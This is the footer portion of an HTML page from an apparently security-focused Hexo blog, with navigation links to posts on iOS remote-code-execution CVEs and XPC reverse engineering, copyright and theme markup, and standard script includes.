                  <i class="fa fa-angle-left"></i> iOS RCE: CVE-2019-8797,CVE-2019-8795,CVE-2019-8794
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2021/12/20/XPC%E9%80%86%E5%90%91/" rel="next" title="XPC逆向">
                  XPC逆向 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2024</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">buffer0verflooow</span>
  </div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  






  





</body>
</html>
